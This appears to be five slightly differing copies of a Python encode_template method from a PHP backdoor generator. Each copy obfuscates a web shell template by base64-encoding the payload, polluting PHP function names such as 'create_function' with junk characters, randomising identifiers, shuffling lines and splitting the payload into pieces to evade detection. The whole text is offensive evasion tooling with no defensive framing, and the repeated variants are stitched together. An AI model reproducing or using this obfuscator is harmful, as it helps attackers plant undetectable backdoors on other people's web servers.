def encode_template(self): b64_new_func_name = random_string() b64_pollution, b64_polluted = pollute_with_static_str('base64_decode', frequency=0.7) createfunc_name = random_string() createfunc_pollution, createfunc_polluted = pollute_with_static_str( 'create_function', frequency=0.7) payload_var = [random_string() for st in range(4)] payload_pollution, payload_polluted = pollute_with_static_str( base64.b64encode(self.payload)) replace_new_func_name = random_string() repl_pollution, repl_polluted = pollute_with_static_str('str_replace', frequency=0.7) final_func_name = random_string() length = len(payload_polluted) offset = 7 piece1 = length / 4 + randrange(-offset, +offset) piece2 = length / 2 + randrange(-offset, +offset) piece3 = length * 3 / 4 + randrange(-offset, +offset) ts_splitted = self.backdoor_template.splitlines() ts_shuffled = ts_splitted[1:6] shuffle(ts_shuffled) ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[6:] self.backdoor_template = '\n'.join(ts_splitted) template = self.backdoor_template.replace('%%B64_ENCODED%%', b64_polluted) template = template.replace('%%B64_FUNC%%', b64_new_func_name) template = template.replace('%%CREATFUNC%%', createfunc_name) template = template.replace('%%CREATFUNC_ENCODED%%', createfunc_polluted) template = template.replace('%%CREATFUNC_POLLUTION%%', createfunc_pollution) template = template.replace('%%REPL_ENCODED%%', repl_polluted) template = template.replace('%%REPL_POLLUTION%%', repl_pollution) template = template.replace('%%REPL_FUNC%%', replace_new_func_name) template = template.replace('%%PAY_VAR1%%', payload_var[0]) template = template.replace('%%PAY_VAR2%%', payload_var[1]) template = template.replace('%%PAY_VAR3%%', payload_var[2]) template = template.replace('%%PAY_VAR4%%', payload_var[3]) template = template.replace('%%PAYLOAD_POLLUTION%%', payload_pollution) template = template.replace('%%B64_POLLUTION%%', b64_pollution) template = template.replace('%%PAYLOAD1%%', payload_polluted[:piece1]) template = template.replace('%%PAYLOAD2%%', payload_polluted[piece1:piece2]) template = template.replace('%%PAYLOAD3%%', payload_polluted[piece2:piece3]) template = template.replace('%%PAYLOAD4%%', payload_polluted[piece3:]) template = template.replace('%%FINALFUNC%%', final_func_name) return template
def encode_template(self): b64_new_func_name = random_string() b64_pollution, b64_polluted = pollute_with_static_str( 'base64_decode', frequency=0.7) createfunc_name = random_string() createfunc_pollution, createfunc_polluted = pollute_with_static_str( 'create_function', frequency=0.7) payload_var = [random_string() for st in range(4)] payload_pollution, payload_polluted = pollute_with_static_str( base64.b64encode(self.payload)) replace_new_func_name = random_string() repl_pollution, repl_polluted = pollute_with_static_str( 'str_replace', frequency=0.7) final_func_name = random_string() length = len(payload_polluted) offset = 7 piece1 = length / 4 + randrange(-offset, +offset) piece2 = length / 2 + randrange(-offset, +offset) piece3 = length * 3 / 4 + randrange(-offset, +offset) ts_splitted = self.backdoor_template.splitlines() ts_shuffled = ts_splitted[1:6] shuffle(ts_shuffled) ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[6:] self.backdoor_template = '\n'.join(ts_splitted) template = self.backdoor_template.replace( '%%B64_ENCODED%%', b64_polluted) template = template.replace('%%B64_FUNC%%', b64_new_func_name) template = template.replace('%%CREATFUNC%%', createfunc_name) template = template.replace( '%%CREATFUNC_ENCODED%%', createfunc_polluted) template = template.replace( '%%CREATFUNC_POLLUTION%%', createfunc_pollution) template = template.replace('%%REPL_ENCODED%%', repl_polluted) template = template.replace('%%REPL_POLLUTION%%', repl_pollution) template = template.replace('%%REPL_FUNC%%', replace_new_func_name) template = template.replace('%%PAY_VAR1%%', payload_var[0]) template = template.replace('%%PAY_VAR2%%', payload_var[1]) template = template.replace('%%PAY_VAR3%%', payload_var[2]) template = template.replace('%%PAY_VAR4%%', payload_var[3]) template = template.replace('%%PAYLOAD_POLLUTION%%', payload_pollution) template = template.replace('%%B64_POLLUTION%%', b64_pollution) template = template.replace('%%PAYLOAD1%%', payload_polluted[:piece1]) template = template.replace( '%%PAYLOAD2%%', payload_polluted[piece1:piece2]) template = template.replace( '%%PAYLOAD3%%', payload_polluted[piece2:piece3]) template = template.replace('%%PAYLOAD4%%', payload_polluted[piece3:]) template = template.replace('%%FINALFUNC%%', final_func_name) return template
def encode_template(self): b64_new_func_name = randstr() b64_pollution, b64_polluted = pollute_with_static_str('base64_decode', frequency=0.7) createfunc_name = randstr() createfunc_pollution, createfunc_polluted = pollute_with_static_str( 'create_function', frequency=0.7) payload_var = [randstr() for st in range(4)] payload_pollution, payload_polluted = pollute_with_static_str( base64.b64encode(self.payload)) replace_new_func_name = randstr() repl_pollution, repl_polluted = pollute_with_static_str('str_replace', frequency=0.7) final_func_name = randstr() length = len(payload_polluted) offset = 7 piece1 = length / 4 + randrange(-offset, +offset) piece2 = length / 2 + randrange(-offset, +offset) piece3 = length * 3 / 4 + randrange(-offset, +offset) ts_splitted = self.backdoor_template.splitlines() ts_shuffled = ts_splitted[1:6] shuffle(ts_shuffled) ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[6:] self.backdoor_template = '\n'.join(ts_splitted) return BdTemplate(self.backdoor_template).substitute( B64_FUNC=b64_new_func_name, B64_ENC=b64_polluted, B64_POLL=b64_pollution, CREAT_FUNC=createfunc_name, CREAT_ENC=createfunc_polluted, CREAT_POLL=createfunc_pollution, REPL_FUNC=replace_new_func_name, REPL_ENC=repl_polluted, REPL_POLL=repl_pollution, PAY_VAR1=payload_var[0], PAY_VAR2=payload_var[1], PAY_VAR3=payload_var[2], PAY_VAR4=payload_var[3], PAY_POLL=payload_pollution, PAY1=payload_polluted[:piece1], PAY2=payload_polluted[piece1:piece2], PAY3=payload_polluted[piece2:piece3], PAY4=payload_polluted[piece3:], FINAL_FUNC=final_func_name)
def encode_template(self): b64_new_func_name = randstr() b64_pollution, b64_polluted = pollute_with_static_str("base64_decode", frequency=0.7) createfunc_name = randstr() createfunc_pollution, createfunc_polluted = pollute_with_static_str("create_function", frequency=0.7) payload_var = [randstr() for st in range(4)] payload_pollution, payload_polluted = pollute_with_static_str(base64.b64encode(self.payload)) replace_new_func_name = randstr() repl_pollution, repl_polluted = pollute_with_static_str("str_replace", frequency=0.7) final_func_name = randstr() length = len(payload_polluted) offset = 7 piece1 = length / 4 + randrange(-offset, +offset) piece2 = length / 2 + randrange(-offset, +offset) piece3 = length * 3 / 4 + randrange(-offset, +offset) ts_splitted = self.backdoor_template.splitlines() ts_shuffled = ts_splitted[1:6] shuffle(ts_shuffled) ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[6:] self.backdoor_template = "\n".join(ts_splitted) return BdTemplate(self.backdoor_template).substitute( B64_FUNC=b64_new_func_name, B64_ENC=b64_polluted, B64_POLL=b64_pollution, CREAT_FUNC=createfunc_name, CREAT_ENC=createfunc_polluted, CREAT_POLL=createfunc_pollution, REPL_FUNC=replace_new_func_name, REPL_ENC=repl_polluted, REPL_POLL=repl_pollution, PAY_VAR1=payload_var[0], PAY_VAR2=payload_var[1], PAY_VAR3=payload_var[2], PAY_VAR4=payload_var[3], PAY_POLL=payload_pollution, PAY1=payload_polluted[:piece1], PAY2=payload_polluted[piece1:piece2], PAY3=payload_polluted[piece2:piece3], PAY4=payload_polluted[piece3:], FINAL_FUNC=final_func_name, )
def encode_template(self): b64_new_func_name = random_string() b64_pollution, b64_polluted = pollute_with_static_str('base64_decode',frequency=0.7) payload_var = random_string() payload_pollution, payload_polluted = pollute_with_static_str(base64.b64encode(self.payload)) replace_new_func_name = random_string() length = len(payload_polluted) offset = 7 piece1 = length / 4 + randrange(-offset,+offset) piece2 = length / 2 + randrange(-offset,+offset) piece3 = length*3/4 + randrange(-offset,+offset) ts_splitted = self.backdoor_template.splitlines() ts_shuffled = ts_splitted[1:-3] shuffle(ts_shuffled) ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[-3:] self.backdoor_template = '\n'.join(ts_splitted) template = self.backdoor_template.replace( '%%B64_ENCODED%%', b64_polluted ) template = template.replace( '%%B64_FUNC%%', b64_new_func_name ) template = template.replace( '%%PAY_VAR%%', payload_var ) template = template.replace( '%%PAYLOAD_POLLUTION%%', payload_pollution ) template = template.replace( '%%B64_POLLUTION%%', b64_pollution ) template = template.replace( '%%PAYLOAD1%%', payload_polluted[:piece1] ) template = template.replace( '%%PAYLOAD2%%', payload_polluted[piece1:piece2] ) template = template.replace( '%%PAYLOAD3%%', payload_polluted[piece2:piece3] ) template = template.replace( '%%PAYLOAD4%%', payload_polluted[piece3:] ) template = template.replace( '%%REPL_FUNC%%', replace_new_func_name ) return template